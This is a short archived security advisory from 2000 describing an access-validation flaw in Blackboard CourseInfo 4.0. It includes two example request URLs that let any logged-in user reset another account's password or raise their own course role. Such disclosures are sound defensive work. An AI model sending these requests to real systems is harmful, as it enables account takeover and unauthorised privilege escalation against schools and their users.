Blackboard CourseInfo 4.0 Database Modification Vulnerability

Bugtraq ID:	1486
Class:	Access Validation Error
CVE:
Remote:	Yes
Local:	Yes
Published:	Jul 18 2000 12:00AM
Updated:	Jul 18 2000 12:00AM
Credit:	Posted to Bugtraq on July 18, 2000 by Pedram Amini <[email protected]>.
Vulnerable:	Blackboard CourseInfo 4.0 - Microsoft Windows NT 4.0 Blackboard CourseInfo for Unix
Not Vulnerable:	Blackboard CourseInfo 5.0 - Microsoft Windows NT 4.0

Blackboard CourseInfo 4.0 Database Modification Vulnerability

Any user who has a valid account on Blackboard CourseInfo is able to modify the database by entering custom form values through any perl script located in /bin and its subdirectories.

For example, the following URL will change the password of any known account:

http://target/bin/common/user_update_passwd.pl?user_id=<value>&firstname=<value>&lastname=<value>&course_id=<value>&password1=<value>&password2=<value>

The URL below will change the status of a user to either a Student (value is "S"), Teacher Assistant (value is "T"), or Instructor (value is "G").

http://target/bin/common/user_update_admin.pl?user_id=<value>&course_id=<value>&role=<value>&available_ind=Y

Blackboard CourseInfo 4.0 Database Modification Vulnerability

See Discussion.

Blackboard CourseInfo 4.0 Database Modification Vulnerability

References:

• CourseInfo Product Homepage (Blackboard)